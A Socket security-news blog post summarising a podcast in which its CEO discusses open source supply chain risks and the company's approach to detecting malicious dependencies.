Security News
38% of CISOs Fear They’re Not Moving Fast Enough on AI
CISOs are racing to adopt AI for cybersecurity, but hurdles in budgets and governance may leave some falling behind in the fight against cyber threats.
Security News
Application Security
Sarah Gooding
February 6, 2024
Socket CEO Feross Aboukhadijeh was recently a guest on the CyberBytes podcast with host Steffan Foley where they discussed open source software and common mistakes companies make when it comes to supply chain security.
Feross highlighted the pressure developers face to ship features rapidly, often without full awareness of the open source code they are utilizing. Security teams don’t want to impede developers moving fast but at the same time are struggling with the challenge of securing massive dependency trees, which are frequently comprised of thousands and thousands of dependencies — source code that almost nobody reads.
The inspiration for Socket came from Feross’ experience creating the Wormhole app with more than 1,000 dependencies. He interviewed more than 40 CISO’s about how they vet their open source dependencies for supply chain attacks and found that most were still tethered to traditional SCA tools that only catch known vulnerabilities. It’s for this reason Socket was designed to drill down into the code of each dependency and analyze it for malicious behavior.
This podcast episode explores the hacker mindset and the complex problem of protecting against threat actors who are naturally inclined to poke at systems. Open source security is currently experiencing a major platform shift towards a more proactive approach, as companies can no longer afford to be obsessed with vulnerabilities to the exclusion of supply chain attacks.
Check out the episode on Spotify or watch the video on YouTube.
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Security News
CISOs are racing to adopt AI for cybersecurity, but hurdles in budgets and governance may leave some falling behind in the fight against cyber threats.
Research
Security News
Socket researchers uncovered a backdoored typosquat of BoltDB in the Go ecosystem, exploiting Go Module Proxy caching to persist undetected for years.
Security News
Company News
Socket is joining TC54 to help develop standards for software supply chain security, contributing to the evolution of SBOMs, CycloneDX, and Package URL specifications.